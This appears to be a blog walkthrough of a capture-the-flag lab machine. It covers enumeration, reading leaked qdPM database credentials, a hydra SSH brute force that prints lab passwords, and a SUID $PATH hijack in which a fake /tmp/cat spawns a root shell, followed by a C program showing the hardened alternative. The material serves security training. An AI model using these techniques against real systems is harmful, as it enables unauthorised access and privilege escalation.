Description
According to information from our intelligence network, ICA is working on a secret project. We need to find out what the project is. Once you have the access information, send it to us. We will place a backdoor to access the system later. You just focus on what the project is. You will probably have to go through several layers of security. The Agency has full confidence that you will successfully complete this mission. Good Luck, Agent!
Difficulty: Easy
Lab setup
First, download the vulnerable machine as a ZIP archive and extract it.
Import the machine into your hypervisor.
Make sure both the attacker machine and the vulnerable machine are configured to use the same NAT network to allow proper communication between them.
Nmap scan
nmap -sC -sV 10.0.2.4
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 0e:77:d9:cb:f8:05:41:b9:e4:45:71:c1:01:ac:da:93 (RSA)
| 256 40:51:93:4b:f8:37:85:fd:a5:f4:d7:27:41:6c:a0:a5 (ECDSA)
|_ 256 09:85:60:c5:35:c1:4d:83:76:93:fb:c7:f0:cd:7b:8e (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-title: qdPM | Login
|_http-server-header: Apache/2.4.48 (Debian)
3306/tcp open mysql MySQL 8.0.26
| ssl-cert: Subject: commonName=MySQL_Server_8.0.26_Auto_Generated_Server_Certificate
| Not valid before: 2021-09-25T10:47:29
|_Not valid after: 2031-09-23T10:47:29
|_ssl-date: TLS randomness does not represent time
| mysql-info:
| Protocol: 10
| Version: 8.0.26
| Thread ID: 14
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, LongColumnFlag, Speaks41ProtocolNew, Speaks41ProtocolOld, FoundRows, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, LongPassword, InteractiveClient, SupportsCompression, ODBCClient, SwitchToSSLAfterHandshake, DontAllowDatabaseTableColumn, ConnectWithDatabase, SupportsTransactions, SupportsLoadDataLocal, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: n&"B\x06N\x02.*\x14\x01!cB\x08\x12F>\x1D/
|_ Auth Plugin Name: caching_sha2_password
MAC Address: 08:00:27:CB:E5:55 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Upon scanning the vulnerable machine, you’ll notice that the SSH, HTTP, and MySQL ports are open, indicating potential entry points for exploitation.
Directory Enumeration
For directory enumeration, I recommend using the Dirsearch tool. Its simple and easy-to-remember syntax makes it a great choice for beginners and experienced users alike.
dirsearch -u 10.0.2.4
[10:02:54] 301 - 306B - /backups -> http://10.0.2.4/backups/
[10:02:54] 200 - 401B - /backups/
[10:02:57] 200 - 0B - /check.php
[10:02:59] 301 - 303B - /core -> http://10.0.2.4/core/
[10:02:59] 301 - 302B - /css -> http://10.0.2.4/css/
[10:03:03] 200 - 894B - /favicon.ico
[10:03:07] 301 - 305B - /images -> http://10.0.2.4/images/
[10:03:07] 200 - 635B - /images/
[10:03:07] 200 - 2KB - /index.php
[10:03:07] 404 - 4KB - /index.php/login/
[10:03:07] 301 - 306B - /install -> http://10.0.2.4/install/
[10:03:08] 200 - 764B - /install/
[10:03:08] 200 - 764B - /install/index.php?upgrade/
[10:03:08] 301 - 309B - /javascript -> http://10.0.2.4/javascript/
[10:03:08] 200 - 573B - /js/
[10:03:12] 301 - 305B - /manual -> http://10.0.2.4/manual/
[10:03:12] 200 - 208B - /manual/index.html
[10:03:21] 200 - 338B - /readme.txt
[10:03:22] 200 - 26B - /robots.txt
[10:03:23] 403 - 273B - /server-status
[10:03:23] 403 - 273B - /server-status/
[10:03:27] 301 - 307B - /template -> http://10.0.2.4/template/
[10:03:28] 200 - 483B - /template/
[10:03:29] 301 - 306B - /uploads -> http://10.0.2.4/uploads/
[10:03:29] 200 - 467B - /uploads/
Several of these paths look suspicious and deserve a closer look.
qdPM is a web-based project management tool, and in this case, we're working with version 9.2, which is known to be vulnerable.
(https://www.exploit-db.com/exploits/50176)
We discovered the database configuration details by accessing the following URL.
http://website/core/config/databases.yml
Let's connect to the MySQL service with the credentials found in that file.
mysql -u qdpmadmin -p -h 10.0.2.4 --ssl=0
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 11
Server version: 8.0.26 MySQL Community Server - GPL
Next, let's explore the databases.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| qdpm |
| staff |
| sys |
+--------------------+
Switch to the 'staff' database, list the tables it contains, and dump one of them for closer analysis.
MySQL [staff]> select * from user;
+------+---------------+--------+---------------------------+
| id | department_id | name | role |
+------+---------------+--------+---------------------------+
| 1 | 1 | Smith | Cyber Security Specialist |
| 2 | 2 | Lucas | Computer Engineer |
| 3 | 1 | Travis | Intelligence Specialist |
| 4 | 1 | Dexter | Cyber Security Analyst |
| 5 | 2 | Meyer | Genetic Engineer |
+------+---------------+--------+---------------------------+
5 rows in set (0.003 sec)
The 'user' table contains a list of usernames. Let's check out the 'login' table, where we can find a list of Base64-encoded passwords. After decoding them, save the results to a password file. Since we know the SSH service is running, we can now use the discovered usernames and passwords to attempt a brute-force attack.
hydra -L user.txt -P password.txt ssh://10.0.2.4
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-16 01:32:46
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 30 login tries (l:6/p:5), ~2 tries per task
[DATA] attacking ssh://10.0.2.4:22/
[22][ssh] host: 10.0.2.4 login: travis password: DJceVy98W28Y7wLg
[22][ssh] host: 10.0.2.4 login: dexter password: 7ZwV4qtg42cmUXGX
^X1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-16 01:32:53
We successfully obtained the passwords for the 'travis' and 'dexter' accounts.
Log in over SSH as dexter.
Next, let's check which files have the SUID (Set User ID) bit set.
find / -type f -perm -04000 -ls 2>/dev/null
-rwsr-xr-x 1 root root 16816 Sep 25 2021 /opt/get_access
-rwsr-xr-x 1 root root 58416 Feb 7 2020 /usr/bin/chfn
-rwsr-xr-x 1 root root 35040 Jul 28 2021 /usr/bin/umount
-rwsr-xr-x 1 root root 88304 Feb 7 2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 182600 Feb 27 2021 /usr/bin/sudo
-rwsr-xr-x 1 root root 63960 Feb 7 2020 /usr/bin/passwd
-rwsr-xr-x 1 root root 44632 Feb 7 2020 /usr/bin/newgrp
-rwsr-xr-x 1 root root 71912 Jul 28 2021 /usr/bin/su
-rwsr-xr-x 1 root root 55528 Jul 28 2021 /usr/bin/mount
-rwsr-xr-x 1 root root 52880 Feb 7 2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 481608 Mar 13 2021 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 51336 Feb 21 2021 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
The '/opt/get_access' binary is not a standard system binary, so let's execute it and see what it does.
dexter@debian:~$ /opt/get_access
############################
######## ICA #######
### ACCESS TO THE SYSTEM ###
############################
Server Information:
- Firewall: AIwall v9.5.2
- OS: Debian 11 "bullseye"
- Network: Local Secure Network 2 (LSN2) v 2.4.1
All services are disabled. Accessing to the system is allowed only within working hours.
Let's examine the content of the 'get_access' binary with the strings command to extract any readable strings.
In the output, one suspicious command stands out:
cat /root/system.info
What does it do? When 'get_access' runs, it calls cat on the 'system.info' file, and because the binary is SUID root, cat runs with root privileges.
The important detail is that the binary calls cat by its bare name rather than by an absolute path. The shell therefore searches the directories listed in $PATH, in order, and executes the first cat it finds. Had the binary referenced /usr/bin/cat directly, $PATH would play no role.
So let's craft a fake cat script in /tmp and put that directory at the front of $PATH. When 'get_access' tries to execute cat, it will run our script instead.
echo -e '#!/bin/bash\n/bin/bash' > /tmp/cat
chmod +x /tmp/cat
export PATH=/tmp:$PATH
Now execute /opt/get_access again: the fake cat runs as root and drops us into a root shell.
root@debian:/root# ls
root.txt system.info
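As an added illustration (not the source of get_access, which this post does not show), the C program below emulates the $PATH lookup that makes the hijack above work and shows how a SUID helper should invoke cat instead: absolute path, fixed environment, no shell. The filesystem stub hijacked_fs and the file name passed to the hardened runner are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Emulate the $PATH search that sh/execvp perform for a bare command name.
 * 'exists' is injected so the search order can be shown without touching the
 * real filesystem. Returns 1 and fills 'out' on a hit, 0 otherwise. */
int path_lookup(const char *path_env, const char *cmd,
                int (*exists)(const char *), char *out, size_t outlen)
{
    if (strchr(cmd, '/')) {                 /* explicit path: no search at all */
        snprintf(out, outlen, "%s", cmd);
        return exists(cmd);
    }
    char buf[4096];
    snprintf(buf, sizeof buf, "%s", path_env);
    char *save;
    for (char *dir = strtok_r(buf, ":", &save); dir; dir = strtok_r(NULL, ":", &save)) {
        snprintf(out, outlen, "%s/%s", dir, cmd);
        if (exists(out))
            return 1;                       /* first hit wins, left to right */
    }
    return 0;
}

/* Constructed stub mirroring the box: a fake /tmp/cat next to the real /usr/bin/cat. */
static int hijacked_fs(const char *p)
{
    return strcmp(p, "/tmp/cat") == 0 || strcmp(p, "/usr/bin/cat") == 0;
}

/* Hardened invocation for a SUID helper: absolute path, a fixed environment that
 * discards the caller's PATH, and execve instead of system(). Returns the child's
 * exit status, or -1 if it could not be run. */
int run_cat_hardened(const char *file)
{
    char *const argv[] = {"/usr/bin/cat", (char *)file, NULL};
    char *const envp[] = {"PATH=/usr/bin:/bin", NULL};
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execve(argv[0], argv, envp); _exit(127); }
    int st;
    waitpid(pid, &st, 0);
    return WIFEXITED(st) ? WEXITSTATUS(st) : -1;
}

int main(void)
{
    char hit[4096];
    path_lookup("/tmp:/usr/bin:/bin", "cat", hijacked_fs, hit, sizeof hit);
    printf("bare 'cat' with PATH=/tmp:... resolves to %s\n", hit);  /* /tmp/cat */
    return run_cat_hardened("/etc/hostname");                       /* assumed file */
}
```

Running the emulation with the attacker's PATH picks /tmp/cat, while the hardened runner never consults PATH, which is the check a code reviewer should apply to any SUID binary that spawns external commands.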
I hope you found this blog insightful and enjoyable. Thank you for reading, keep exploring and keep learning!